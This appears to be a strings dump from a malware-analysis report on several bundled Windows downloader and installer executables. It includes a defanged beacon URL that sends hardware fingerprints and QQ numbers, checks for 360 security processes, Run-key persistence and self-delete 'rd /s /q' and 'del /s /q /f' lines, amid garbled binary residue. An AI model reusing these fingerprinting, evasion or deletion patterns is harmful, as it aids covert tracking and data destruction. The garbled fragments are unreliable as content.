ADVAPI32.dll
ShellExecuteW
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
WS2_32.dll
iphlpapi.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
WINTRUST.dll
VERSION.dll
GetConsoleOutputCP
GetCPInfo
.?AV?$FieldVector@VURL@p2s@@@serial@@
.?AVP2SValidUrl@p2s@@
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
g\Xbdyy.dll
\bdupdate.exe
\autoupdate.ini
\banner.jpg
\Baidu\BaiduPlayer\bdupdate.exe
\Baidu\BaiduPlayer\autoupdate.ini
\Baidu\BaiduPlayer\banner.jpg
\BaiduPlayer.exe
&Version=%d.%d.%d.%d
&LangID=%d
!\Cabinet.dll
@.exe
\bugreport.exe
bdbugreport_%u
CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d
MemoryPool : Total=%d, Free=%d
User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d
Memory Corruption : %s
"%s" --smname=%s
CryptQueryObject failed with %x
CryptMsgGetParam failed with %x
Program Name : %s
Publisher Link : %s
MoreInfo Link : %s
CertFindCertificateInStore failed with %x
Signer Certificate:
TimeStamp Certificate:
Date of TimeStamp : d/d/d d:d
CertGetNameString failed.
Issuer Name: %s
Subject Name: %s
CryptDecodeObject failed with %x
The file "%s" is signed and the signature was verified.
The file "%s" is not signed.
An unknown error occurred trying to verify the signature of the "%s" file.
Error is: 0x%x.
\platform_%d.log
\platform.log
\platform_crush_%d.log
\platform_quit_%d.log
%sV%u
\running.pid
SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}BaiduP2PService.exe
FTP://
HTTP://
\qqwry.dat
.bdre
.bdtp
\Baidu\BaiduPlayer\Service.ini
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet
Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex
F=>%p, S=>%d
d\P2PBase.dll
\P2SBase.dll
\P2PStatReport.dll
\StatReport.exe
Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u
BufferPercent=%d
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u
Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s
Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i
%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s
WAdd=%u.%u.%u.%u:%u(%s)
LAddr=%u.%u.%u.%u:%u
EAddr=%u.%u.%u.%u:%u
Ver=%u.%u.%u.%u
Reserve=%d
UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s
Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-
\Baidu\BaiduPlayer\tasks.dat
\Baidu\BaiduPlayer\tasks.ini
field%d
\assfile.dll
\ManagerStub.dll
Test Fail, Error=%d, r2=%d
MyBDHotkey1
MyBDHotkey
MyBDHotkeyVer
CKernel32.dll
/commonlib.dll
%Program Files%\tools\BaiduP2PService.exe
"%Program Files%\tools\BaiduP2PService.exe"
Baidu.com, Inc.
1,0,14,43
QQPCDownload71960.exe_2776:
.text
`.rdata
@.data
.rsrc
aSSSh
FTPjK
FtPj;
C.PjRV
.mixcrt
KERNEL32.DLL
mscoree.dll
portuguese-brazilian
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
kernel32.dll
operator
GetProcessWindowStation
USER32.DLL
inflate 1.1.3 Copyright 1995-1998 Mark Adler
X;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
d:\QQPCDownloader_proj\PackageTools\product\win32\dbginfo\kpacket.pdb
KERNEL32.dll
USER32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
zcÁ
.?AUICryptoSetPassword@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AUICryptoGetTextPassword@@
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Microsoft.Windows.HummerSetup" type="win32"></assemblyIdentity>
Hummer Setup EXE
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>%s%s_d_%x
setup.xml
A%s%s
%s_d_%x
%s%s%s
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe
MM-liao8863.exe_2808:
.text
`.rdata
@.data
.rsrc
SSSSh
FtPh
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
C:\Windows\Temp\temp.icon
c://temp.icon
ProExe
DownloadUrl
ErrorUrl
AdvertUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
<4,$?7/'
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceTypeModifier: x
RemovableMedia: %d
CommandQueueing: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
Drive%dType
Drive%dControllerBufferSize
Drive%dControllerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
F%D,3
OLEACC.dll
SHLWAPI.dll
WSOCK32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteA
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
VERSION.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
InternetOpenUrlA
HttpOpenRequestA
WININET.dll
.?AVCCmdTarget@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
zcÁ
00000000000000000001
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe
`R.qB
h/y%DlRZ
J!Ç
<yB*.*
yR^y.%U3
/.Ro}!
p)%sQ
CZ%SY
.vyOx
.Pm[<
42a%u
O%fWU
%cPqt
F2/%c
C7%SQ5
XU%fR
QN.Ui
IßD
(Bô|
.Qsty
.bYV`
40%sS
%%co\s
P.WGD
2Um
%U2b&0
%se7sQ
[Q.QN]
4g%x=XL$5
.Bsw&wf
uÿQ
R#.oR
45.sSC
OBW2%S2%S2
u\%Cr@
.Pd4{[K.On
W.eQYT
gB7%U
9~ui.QBv@
J.pEu
\.MdB
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>accKeyboardShortcut
mscoree.dll
ekernel32.dll
KERNEL32.DLL
DownloadInstall.Document
(*.*)
Output.prn$
(*.prn)|*.prn|
(*.*)|*.*||
1, 0, 0, 1
DownloadInstall.EXE
install1393485.exe_1148:
`.rsrc
\rsdebug.ini
c:\%s
dbghelp.dll
kernel32.dll
d-d-d(d-d-d)
Kernel32.dll
\rsmain.exe
[d-d-d][d:d:d:d]
%s\%s
%s\*.*
C:\Temp
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
\Rs7zSfx.log
\setup.dll
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}%s\CompsVer.inf
Setup.exe
%s\auto.ini
@Sleep...%d
%s Start
%s End
{E5C53971-D80E-4500-BE0D-761BF3CD8457}Unsupported Method
Password is not defined
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}XXXXXXXXXXX
{X-X-X-XX-XXXXXX}\NetConfig.ini
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s","result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
Label.dat
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
%sbase
Iphlpapi.dll
\\.\PhysicalDrive%d
\\.\Scsi%d:
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Content-Type: application/x-www-form-urlencoded
HTTP/1.0
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
COMCTL32.dll
GDI32.dll
restorelog.txt
zcÁ
T3%dU
K.ZuNN
)$OI%f
B.Yo@
26.Ip
up.yF
~mM.Bv
qPndR.Ts
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://sf.symcb.com/sf.crl0f
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/rpa0
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
z.oao
].XcG
~jq.wz
.FDF`O
;.bd/
:U%SN
ej.CC
`X.UT?.
.lqwD
*e_!.sWI$`
]>!.gB
k.Rrt
TCP_yy
%S5]*
.fb#c$Z4
h[%D}_
$T.Ia
V.jurV
Sù,
T%xYS3
9kl.Uw
We]%F
u.zQ0
4\ R%d
.qJ4C9.
[email protected]
y.Di
vJY.lNk'1
.Gi#O$@$
~D.Hh
U.LZe
yo.NRL;
.npr =
y/"Z.Jn(
Diurl
A.Ot=_d
.psd x
}.eNk^6E
@%X;g
~gq%c^
;.Aum
_6}"%_^&
36.hU
S}i;%u
$.dls
iY.Ub
%cUNX<
EHJJGA[.Oj
S.lW"
.hw1.
.CB5t
.MAF!
|%X3j
.aRSr
".xNT
3.Mh)
X2.Wq
B%.GMK
8&H8.VW
a%s%s
.dk:8e`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
.text
`.rdata
@.data
.rsrc
@.reloc
QSVSSSh
>%uPV
|$D.tD
.tgPV
FTPjK
FtPj;
C.PjRVj
u.VV3
|$$vL9|$ u%Sh
Advapi32.dll
Explorer.exe
NtDll.dll
%d %d %d %d
Failed to call WTSQueryUserToken, err= 0x%x
wtsapi32.DLL
Could not open pipe
SetNamedPipeHandleState failed
\\.\pipe\RISING_RSD_BU
%*.*f
/RUNAS %s
Failed to load psapi.dll.
Psapi.dll
Setup.exe End with ErrorCode: 0xX
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Password
Port
%s\Data\%s\%s.ini
setup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
%s(%s)
ReportView
KERNEL32.DLL
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
%DESKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
InitializeSecurityDescriptor() failed.Error %d
GetFileSecurity() failed. Error %d
InitializeSid() failed. Error %d
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
<!--%s-->
WinSessionThread GetPidByName dwPID = %d , name=%s!
WTSQueryUserToken Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
CreateProcess2 Return: %d
LoadLibrary Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
Userenv.DLL
GetFileAttributes %s return: %d
Delete File %s fail, Err: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
RsInstallService(%s) Return: %d
ChangeServiceConfig Failed! Err Code: %d
CreateService Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
RsInstallService(%s)
RsUninstallService(%s) Return: %d
DeleteService Failed! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
RsUninstallService(%s)
OpenService Failed! Err Code: %d
LoadLibrary(Advapi32.dll) Failed!
RsSetServiceFailureAction(%s) Return: %d
GetProcAddress(%s) Failed!
ChangeServiceConfig2 Failed! Err Code: %d
RsSetServiceFailureAction(%s)
QueryServiceStatus Failed! Err Code: %d
StartService Failed! Err Code: %d
RsStartService(%s)
Wait for Service %s Time Out!
QueryServiceStatus(%s) Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
Stop Service %s Dependencies...
%s's Stop is Pending...
Service %s is Stopped...
OpenService(%s) Failed! Err Code: %d
RsStopService(%s)
Rs%sInstallCom(%s) Return: %d
LoadLibrary(%s) Failed!
%s Failed! ErrMsg: %s
Rs%sInstallCom(%s)...
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess begin dwSessionID = %d!
WININIT.INI
\WININIT.INI
HKEY_CURRENT_CONFIG
"%s" %s
\RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
%s Loaded By %s
EXPLORER.EXE
Setup.exe Begin----------------------------------
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
StopComponent(%s)...
StartComponent(%s)...
Report Error!
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Check XML File %s Failed
Check File %s Failed
BackUp XML File From: %s To %s
Delete XML File: %s
Copy XML File From: %s To %s
%s\RsMgrsvc.ini
URLInfoAbout
hXXp://help.ikaka.com/
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=RSD
Delete File %s
Copy File From %s To %s
CompsVer.inf
Copy Path From %s To %s
Down Load %s To Path: %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
RunFirstInstall Successfully...NeedReboot: %d
InstallComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
RunFirstInstall, AfterReboot: %d
RavTmp: %s
file not exist : %s
succeed to download %s
Failed to download %s. ErrCode = %d; hr = %d
Failed to verify %s
%s%s/%s%s.inf
Failed to get download url from %s
URLLIST
Failed to load %s.
%s%s/%s/%s/%s
%s\%s\%s\%s
%s%s/%s/%s
%s\%s\%s
Failed to get %s-ITEM.
Failed to get %s-FILES.
Failed to get %s-COMPONENT.
Download %s retry > 3
%s/%s/%s_xml.zip
%s\%s\%s.xml
%s%s/%s/%s.xml
Failed to get %s' newver from %s
SCMD
REGVERKEY
REGKEYVALUE
REGKEYNAME
REGKEY
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Delete File Return: %d, NeedReboot: %d
Prepare To Delete File %s...
Back Up File From: %s To: %s Return: %d
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
Install Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
Old Link File: %s
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
langsel.exe
Setup Log (*.log)
*.log
A%d M
%DATADIR%
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmpSOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
nserver.exe
%FIRSTPART%
%COMMONDIR%
%DOMINODATA%
%DOMINODIR%
%SYSDIR64%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
</%s>
standalone="%s"
encoding="%s"
version="%s"
X;
%s='%s'
%s="%s"
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
socket() failed; %d
Range: bytes=%d-
hXXp://
portuguese-brazilian
.rstmp
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
SetNamedPipeHandleState
WaitNamedPipeA
GetWindowsDirectoryA
KERNEL32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
EnumWindows
EnumChildWindows
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
RegCreateKeyExA
RegDeleteKeyA
RegSetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
VERSION.dll
WSOCK32.dll
GetCPInfo
11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB
>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK
!'!555''''
!! **""!
#### # # # # # # # #
6,,,6,,6,66
,,,,66,,6,
